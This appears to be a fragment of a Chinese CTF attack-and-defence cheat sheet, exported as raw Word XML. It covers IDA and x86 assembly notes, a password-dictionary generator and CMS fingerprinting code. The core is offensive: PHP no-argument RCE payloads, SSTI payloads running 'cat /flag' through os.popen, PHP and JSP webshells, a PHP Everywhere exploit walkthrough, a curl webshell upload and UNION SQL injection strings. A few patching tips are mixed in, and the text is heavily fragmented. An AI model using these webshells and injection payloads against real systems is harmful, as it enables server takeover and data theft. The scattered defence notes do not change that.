            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1049" DrawAspect="Content" ObjectID="_1468075749" r:id="rId246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50" o:spt="75" type="#_x0000_t75" style="height:35pt;width:46.65pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId249" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1050" DrawAspect="Content" ObjectID="_1468075750" r:id="rId248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exrex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#传入余个host, demo.webdic.com. 那么，demo, webdic都可能作为字典的一部分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web_white = ['com', 'cn', 'gov', 'edu', 'org', 'www']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host_para(host):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#对host进行分析，处理成想要的格式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'://'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host.split('://')[1].replace('/',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host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dic_creat(hosts):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web_dics = hosts.split('.')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#取出有用的东西，如demo, webdic, 放入字典生成的地方，生成字典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#将核心的生成规则，写入配置文件，方便后期使用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f_rule = open('rule.ini', 'r', encoding='utf-8')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f_rule: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'#' != i[0]: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rule = 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 = open('pass_1.txt', 'w')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web_dic in web_dics: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web_dic not in web_white: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f_pass = open('pass_0.txt', 'r')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dic_pass in f_pass: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dics = list(exrex.generate(rule.format(web_dic = web_dic, dic_pass = dic_pass.strip('\n'))))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for dic in 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len(dic) &gt; 4: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 = open('pass_1.txt', 'a+')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f_pass_out.write(dic + '\n')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print(dic)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dic_creat(host_para(sys.argv[0]))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sys.exit(0)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#dic_create(host_para('demo.webdic.com'))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8" w:name="_Toc14732"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）指纹识别</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68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1" o:spt="75" type="#_x0000_t75" style="height:35pt;width:50.2pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId251" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1051" DrawAspect="Content" ObjectID="_1468075751" r:id="rId250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builtwith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urllib.parse import urlparse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requests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hashlib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argparse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BuiltCms(object):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__init__(self, url):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super(BuiltCms, self).__init__()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self.url = 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#调用builtwith，识别web开发信息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self.built()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#调用识别方法，识别web的cms信息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self.cms()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result['cms'] = cms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#打印结果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 (result)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built(self):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builtwith.parse(self.url)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result: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result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{}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cms(self):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#这里要遍历指纹数据库作比较，进行页面MD5比较以及运行页面内容匹配识别，就不举例了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'cms_name_phpcms'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md5(self,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hashlib.md5(content).getdigest()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cont(self, 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re.search(regex,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False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 = BuiltCms('http://www.phpcms.com')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 = argparse.ArgumentParser(description = "CMS NuiltScan Ver:1.0")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paraser.add_argument("-u", "--url", metavar = "", help = "weburl address")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args = paraser.parse_args()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try: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url = args.url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not url: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print('Usage : cms.py -u http://tests.com/')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sys.exit(1)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BuiltCms(url)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print('[*]Fecting CMS ...')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print('\n\t{}\n'.format(result))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print('[-]Complete')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except KeyboardInterrupt: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sys.exit(1)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9" w:name="_Toc12848"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69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0" w:name="_Toc5886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1.基本操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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查看窗口几种方式:F5、Tap、双击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弹出窗口恢复:Windows-Reset Desktop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各种窗口打开:Windows下选择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 View页面格式转换:右键Graph view和右键Text view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修改汇编指令:Edit-Patch program-Assmble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修改地址大小值:Edit-Patch program-Change byte...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函数改名:右键-N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导出文件:Edit-Patch-program，之后选上Create backup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显示不同格式数字:点击数字右键选择不同格式显示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查看010Editor窗口F6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1" w:name="_Toc14998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2.汇编指令</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71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通用数据传送指令.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 传送字或字节.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MOVSX 先符号扩展,再传送.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MOVZX 先零扩展,再传送.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 把字压入堆栈.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 把字弹出堆栈.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 把AX,CX,DX,BX,SP,BP,SI,DI依次压入堆栈.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 把DI,SI,BP,SP,BX,DX,CX,AX依次弹出堆栈.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PUSHAD 把EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI依次压入堆栈.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POPAD 把EDI,ESI,EBP,ESP,EBX,EDX,ECX,EAX依次弹出堆栈.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BSWAP 交换32位寄存器里字节的顺序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XCHG 交换字或字节.( 至少有一个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作数为寄存器,段寄存器不可作为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CMPXCHG 比较并交换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作数.( 第二个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作数必须为累加器AL/AX/EAX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XADD 先交换再累加.( 结果在第一个**作数里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XLAT 字节查表转换.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── BX 指向一张 256 字节的表的起点, AL 为表的索引值 (0-255,即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0-FFH); 返回 AL 为查表结果. ( [BX+AL]-&gt;AL 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IN I/O端口输入. ( 语法: IN 累加器, {端口号│DX}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OUT I/O端口输出. ( 语法: OUT {端口号│DX},累加器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输入输出端口由立即方式指定时, 其范围是 0-255; 由寄存器 DX 指定时,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其范围是 0-65535.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目的地址传送指令.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LEA 装入有效地址.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LEA DX,string ;把偏移地址存到DX.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LDS 传送目标指针,把指针内容装入DS.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LDS SI,string ;把段地址:偏移地址存到DS:SI.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LES 传送目标指针,把指针内容装入ES.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LES DI,string ;把段地址:偏移地址存到ES:DI.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LFS 传送目标指针,把指针内容装入FS.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LFS DI,string ;把段地址:偏移地址存到FS:DI.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LGS 传送目标指针,把指针内容装入GS.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LGS DI,string ;把段地址:偏移地址存到GS:DI.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LSS 传送目标指针,把指针内容装入SS.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LSS DI,string ;把段地址:偏移地址存到SS:DI.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标志传送指令.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LAHF 标志寄存器传送,把标志装入AH.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SAHF 标志寄存器传送,把AH内容装入标志寄存器.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PUSHF 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POPF 标志出栈.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PUSHD 32位标志入栈.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POPD 32位标志出栈.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2" w:name="t1"/>
      <w:bookmarkEnd w:id="72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ADD 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"https://so.csdn.net/so/search?q=ADC&amp;spm=1001.2101.3001.7020"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ADC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 带进位加法.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INC 加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AAA 加法的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"https://so.csdn.net/so/search?q=ASCII%E7%A0%81&amp;spm=1001.2101.3001.7020"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ASCII码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DAA 加法的十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"https://so.csdn.net/so/search?q=%E8%BF%9B%E5%88%B6&amp;spm=1001.2101.3001.7020"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进制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SUB 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SBB 带借位减法.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DEC 减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NEC 求反(以 0 减之).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 比较.(两**作数作减法,仅修改标志位,不回送结果).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AAS 减法的ASCII码调整.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DAS 减法的十进制调整.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MUL 无符号乘法.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IMUL 整数乘法.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以上两条,结果回送AH和AL(字节运算),或DX和AX(字运算),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AAM 乘法的ASCII码调整.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DIV 无符号除法.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IDIV 整数除法.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以上两条,结果回送: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商回送AL,余数回送AH, (字节运算);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或 商回送AX,余数回送DX, (字运算).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AAD 除法的ASCII码调整.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CBW 字节转换为字. (把AL中字节的符号扩展到AH中去)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 字转换为双字. (把AX中的字的符号扩展到DX中去)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CWDE 字转换为双字. (把AX中的字符号扩展到EAX中去)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CDQ 双字扩展. (把EAX中的字的符号扩展到EDX中去)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3" w:name="t2"/>
      <w:bookmarkEnd w:id="73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AND 与运算.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OR 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XOR 异或运算.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NOT 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TEST 测试.(两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作数作与运算,仅修改标志位,不回送结果).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逻辑左移.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SAL 算术左移.(=SHL)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SHR 逻辑右移.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SAR 算术右移.(=SHR)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ROL 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ROR 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RCL 通过进位的循环左移.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RCR 通过进位的循环右移.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以上八种移位指令,其移位次数可达255次.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移位一次时, 可直接用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作码. 如 SHL AX,1.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移位&gt;1次时, 则由寄存器CL给出移位次数.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 MOV CL,04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AX,CL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4" w:name="t3"/>
      <w:bookmarkEnd w:id="74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DS:SI 源串段寄存器 :源串变址.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ES:DI 目标串段寄存器:目标串变址.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CX 重复次数计数器.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AL/AX 扫描值.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D标志 0表示重复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作中SI和DI应自动增量; 1表示应自动减量.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Z标志 用来控制扫描或比较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作的结束.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MOVS 串传送.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MOVSB 传送字符. MOVSW 传送字. MOVSD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CMPS 串比较.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CMPSB 比较字符. CMPSW 比较字.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SCAS 串扫描.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把AL或AX的内容与目标串作比较,比较结果反映在标志位.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LODS 装入串.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把源串中的元素(字或字节)逐一装入AL或AX中.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LODSB 传送字符. LODSW 传送字. LODSD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STOS 保存串.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是LODS的逆过程.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 当CX/ECX&lt;&gt;0时重复.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REPE/REPZ 当ZF=1或比较结果相等,且CX/ECX&lt;&gt;0时重复.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REPNE/REPNZ 当ZF=0或比较结果不相等,且CX/ECX&lt;&gt;0时重复.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REPC 当CF=1且CX/ECX&lt;&gt;0时重复.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REPNC 当CF=0且CX/ECX&lt;&gt;0时重复.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5" w:name="t4"/>
      <w:bookmarkEnd w:id="75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1&gt;无条件转移指令 (长转移)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JMP 无条件转移指令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 过程调用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RET/RETF过程返回.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2&gt;条件转移指令 (短转移,-128到+127的距离内)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当且仅当(SF XOR OF)=1时,OP1&lt;OP2 )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JA/JNBE 不小于或不等于时转移.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JAE/JNB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JB/JNAE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JBE/JNA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以上四条,测试无符号整数运算的结果(标志C和Z).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JG/JNLE 大于转移.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JGE/JNL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JL/JNGE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JLE/JNG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以上四条,测试带符号整数运算的结果(标志S,O和Z).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JE/JZ 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JNE/JNZ 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 有进位时转移.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JNC 无进位时转移.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JNO 不溢出时转移.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JNP/JPO 奇偶性为奇数时转移.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JNS 符号位为 “0”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JO 溢出转移.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JP/JPE 奇偶性为偶数时转移.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JS 符号位为 “1”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3&gt;循环控制指令(短转移)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 CX不为零时循环.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LOOPE/LOOPZ CX不为零且标志Z=1时循环.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LOOPNE/LOOPNZ CX不为零且标志Z=0时循环.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JCXZ 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JECXZ ECX为零时转移.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 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INTO 溢出中断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IRET 中断返回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5&gt;处理器控制指令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HLT 处理器暂停, 直到出现中断或复位信号才继续.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WAIT 当芯片引线TEST为高电平时使CPU进入等待状态.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ESC 转换到外处理器.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LOCK 封锁总线.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NOP 空**作.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STC 置进位标志位.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CLC 清进位标志位.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CMC 进位标志取反.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STD 置方向标志位.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CLD 清方向标志位.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STI 置中断允许位.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CLI 清中断允许位.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bookmarkStart w:id="76" w:name="t5"/>
      <w:bookmarkEnd w:id="76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define 定义一个标识符来表示变量.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registersymbol是注册符号,注册之后可以用名称代替地址.例如alloc(newmem1,1024)后调用registersymbol(newmem1)，然后在CE表里输入newmem1就会指向newmem1的起始地址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unRegistersymbol(newmem1)取消注册符号.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createthread(th1)创建线程启动.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 定义字(2字节).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PROC 定义过程.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ENDP 过程结束.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SEGMENT 定义段.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ASSUME 建立段寄存器寻址.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ENDS 段结束.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 程序结束.</w:t>
      </w:r>
      <w:bookmarkStart w:id="77" w:name="t6"/>
      <w:bookmarkEnd w:id="7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内存申请相关的函数主要有 alloca,calloc,malloc,free,realloc,sbrk等，malloc()和calloc()都可以用来动态分配内存空间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malloc()函数有一个参数,即要分配的内存空间的大小: void *malloc(size_t size);.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calloc()函数有两个参数,分别为元素的数目和每个元素的大小,这两个参数的乘积就是要分配的内存空间的大小。void *calloc(size_t numElements, size_t sizeOfElement).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dealloc(name)释放内存.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ret//重置地址.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db定义字节类型变量，一个字节数据占1个字节单元，读完一个，偏移量加1.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dw定义字类型变量，一个字数据占2个字节单元，读完一个，偏移量加2.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dd定义双字类型变量，一个双字数据占4个字节单元，读完一个，偏移量加4.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LABEL(KB)定义大小属性.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8" w:name="_Toc2437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3.ASCII码表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78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3150" cy="3981450"/>
            <wp:effectExtent l="0" t="0" r="3810" b="11430"/>
            <wp:docPr id="12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 descr="IMG_25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9" w:name="_Toc29393"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通防</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc25735"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>PWN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80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使用，将题目文件放在evilPatcher下的test文件夹，在evilPatcher文件夹打开cmd输入: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python evilPatcher.py test/文件名 sandboxs/mini_sandbox.asm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之后在test文件夹会发现打好补丁的文件名.patch文件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3124835"/>
            <wp:effectExtent l="0" t="0" r="5715" b="14605"/>
            <wp:docPr id="131" name="图片 131" descr="屏幕截图 2023-07-11 21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07-11 2105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0500" cy="1956435"/>
            <wp:effectExtent l="0" t="0" r="2540" b="952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1" w:name="_Toc14071"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Web代码审计</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81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2" w:name="_Toc351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1.PHP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82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localeconv()函数：用于获取本地信息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current()函数：一个数组指针函数,用于获取当前指针所在位置的元素值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scandir()函数：获取当前文件目录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var_dump()函数：显示关于一个或多个表达式的结构信息，包括表达式的类型与值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array_flip(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)函数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用于反转/交换数组中的键名和对应关联的键值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array_rand()函数：随机获取数组元素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SQL注入漏洞防御：在存在漏洞的参数上使用addslash()方法：例如$username = addslashes($username);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WAF过滤缺失漏洞：存在WAF没有过滤的关键字符，例如!preg_match("/\'|http|\"|\`|cookie/", $str);变为!preg_match("/\'|http|\"|&lt;|&gt;|\`|cookie/", $str);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反序列化无参RCE攻击：无参RCE模板：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写文件进服务器：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var_dump(scandir(current(localeconv())));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随机读取服务器文件内容：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var_dump(readfile(array_rand(array_flip(scandir(current(localeconv()))))));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Xerte文件读取exp：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2" o:spt="75" type="#_x0000_t75" style="height:35pt;width:37pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId256" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1052" DrawAspect="Content" ObjectID="_1468075752" r:id="rId255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Xerte文件上传exp：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3" o:spt="75" type="#_x0000_t75" style="height:35pt;width:42.6pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId258" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1053" DrawAspect="Content" ObjectID="_1468075753" r:id="rId257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函数中md5(a) === md5(b)绕过：只需要将参数a、b的初始化代码写在一行即可绕过，因为函数输出信息都在同一行。例如：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$x = new Error($s, 1); $y = new Error($s, 2);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file_get_content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数：读取文件，例如：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file_get_content('/flag')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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PHP版本查看：F12之后在header（标头）中查看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3675" cy="3509010"/>
            <wp:effectExtent l="0" t="0" r="14605" b="11430"/>
            <wp:docPr id="1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addslash绕过：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使用urlencode()函数，例如：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2948940" cy="1356360"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="19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之后传参：?参数名={上面的结果}即可查看信息：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21690"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270"/>
            <wp:docPr id="1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3" w:name="_Toc2962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2.Python</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83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SSTI漏洞防御：将存在漏洞的参数传递上使用双大括号方式传参：例如 template = 'Good Job %s!' % name变为template = 'Good Job {{name}}!'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SSTI漏洞攻击：当前文件：{{url_for['__glob'+'als__']['os']['popen']('cat *')['read']()}}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flag文件：{{url_for['__glob'+'als__']['os']['popen']('cat /flag')['read']()}}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('__glob'+'als__'：因为存在黑名单过滤，实际上也就是'__globals__'，代表文件操作协议。'os'：程序与操作系统进行交互的接口。'popen'：打开文件。'cat *'：读取当前页面的文件内容。'read'：读操作)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4" w:name="_Toc920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3.Java</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84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fastjson漏洞防御：版本如果低于1.2.83则存在漏洞，将pom.xml中版本升级为1.2.83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5" w:name="_Toc18827"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Diresearch</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85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在diresearch文件夹下打开cmd，输入python dirsearch.py -u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即可扫描该地址下所有页面信息，比御剑好用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55315"/>
            <wp:effectExtent l="0" t="0" r="4445" b="14605"/>
            <wp:docPr id="1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6" w:name="_Toc4387"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一句话木马</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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最基础一句话木马，配合蚁剑使用：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4" o:spt="75" type="#_x0000_t75" style="height:35pt;width:26.85pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId264" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1054" DrawAspect="Content" ObjectID="_1468075754" r:id="rId26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shell权限一句话木马，配合cmd指令使用，url后缀为?1=cmd指令（类似?1=cmd /flag或者?1=system('tac /f*');）：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5" o:spt="75" type="#_x0000_t75" style="height:35pt;width:31.95pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId266" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1055" DrawAspect="Content" ObjectID="_1468075755" r:id="rId26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Base64版上传一句话木马文件，访问上传的文件即可get shell，执行读取文件操作，参数为cmd，请求的url后缀为shell.php?cmd=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输入的cmd执行（例如cat /flag或者system('tac /f*');）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6" o:spt="75" type="#_x0000_t75" style="height:35pt;width:39.55pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId268" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1056" DrawAspect="Content" ObjectID="_1468075756" r:id="rId26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Burpsuite一句话木马请求发送，配合蚁剑使用，主要用来处理没有上传页面只有接口的请求，注意修改接口和url：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7" o:spt="75" type="#_x0000_t75" style="height:35pt;width:108pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId270" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1057" DrawAspect="Content" ObjectID="_1468075757" r:id="rId26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PHP一句话读取flag：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8" o:spt="75" type="#_x0000_t75" style="height:35pt;width:33.95pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId272" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1058" DrawAspect="Content" ObjectID="_1468075758" r:id="rId27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php_everywhere木马，任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求，并在站点上执行任意 PHP 代码，将里面的代码覆盖到网页中的任意位置，保存后在出现的内容点击Execute按钮，之后访问url前缀/fuck.php?cmd=cmd指令（类似/fuck.php?cmd=system('tac /f*');），注意修改里面的url地址：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9" o:spt="75" type="#_x0000_t75" style="height:35pt;width:83.15pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId274" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1059" DrawAspect="Content" ObjectID="_1468075759" r:id="rId27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输入框读文件一句话木马：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0" o:spt="75" type="#_x0000_t75" style="height:35pt;width:38.55pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId276" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1060" DrawAspect="Content" ObjectID="_1468075760" r:id="rId27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多种一句话木马混打：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1" o:spt="75" type="#_x0000_t75" style="height:35pt;width:36.5pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId278" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1061" DrawAspect="Content" ObjectID="_1468075761" r:id="rId277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文件放在虚拟机桌面后运行：curl -i -s -X POST -F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"mailto:\“logo_file=@shell.pht\”"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“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>logo_file=@shell.pht</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/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ur地址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46320" cy="3756660"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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之后访问：url前缀/data/media/labels/shell.pht，或者用剩下几种一句话效果尝试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70100"/>
            <wp:effectExtent l="0" t="0" r="6350" b="254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PHP小马编写：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$path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$text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$file = fopen($path,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w+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fwrite($file,$text);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&lt;form action=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post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//读取当前文件路径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&lt;?echo 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DOCUMENT_ROOT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].$_SERVER[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PHP_SELF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];?&gt;&lt;/br&gt;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//保存内容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//写入内容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&lt;br&gt;&lt;textarea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cols=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90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rows=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50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&gt;&lt;/textarea&gt;&lt;br&gt;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&lt;/form&gt;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JSP一句话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&lt;%execute request(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)%&gt;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PHP绕过WAF的一句话，原理是利用BASE64拼接后解码出来就是传统一句话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2495550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7" w:name="_Toc16157"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>手写SQL注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/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88" w:name="_Toc2403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1.json传参形式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88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爆库：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--data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT database()),3,4,5,6,7,8,9,0,1,2;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08220" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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爆字段：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group_concat(column_name) from information_schema.columns where table_name=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x表名的16进制字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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1158240"/>
            <wp:effectExtent l="0" t="0" r="0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爆数据：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group_concat(flag) from flag),3,4,5,6,7,8,9,0,1,2; -- "}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4800600" cy="1127760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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9" w:name="_Toc889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2.时间盲注脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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注意更改里面的地址和burpsuite拦截的请求header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62" o:spt="75" type="#_x0000_t75" style="height:35pt;width:127.75pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId286" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1062" DrawAspect="Content" ObjectID="_1468075762" r:id="rId285">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="2654300"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1270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0" w:name="_Toc24328"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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文件读取漏洞：在接口url参数后追加file:/文件名，即url前缀?参数名=file:/文件名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1" w:name="_Toc32265"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Nuclei</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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所有CVE都在template文件夹下作为脚本使用，使用指令：nuclei -u url地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4267200" cy="2430780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1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2" w:name="_Toc1927"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Xray</w:t>
      </w:r>
